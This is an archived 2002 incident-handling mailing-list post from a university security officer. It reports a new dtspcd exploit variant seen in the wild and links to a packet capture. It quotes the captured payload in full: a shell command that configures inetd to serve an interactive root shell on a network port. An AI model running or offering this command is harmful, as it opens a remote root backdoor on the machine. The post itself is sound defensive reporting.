Until last week, all the dtspcd exploits I'd seen had been the same (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating around. The ASCII output looks something like this: /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z; /usr/sbin/inetd -s /tmp/z; sleep 10; A copy of the capture can be downloaded from here: http://security.wayne.edu/downloads/dtspcd-1.cap -- Nathan W. Labadie | ab0781at_private Sr. Security Specialist | 313/577.2126 Wayne State University | 313/577.1338 fax C&IT Information Security Office: http://security.wayne.edu ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Feb 14 2002 - 16:08:47 PST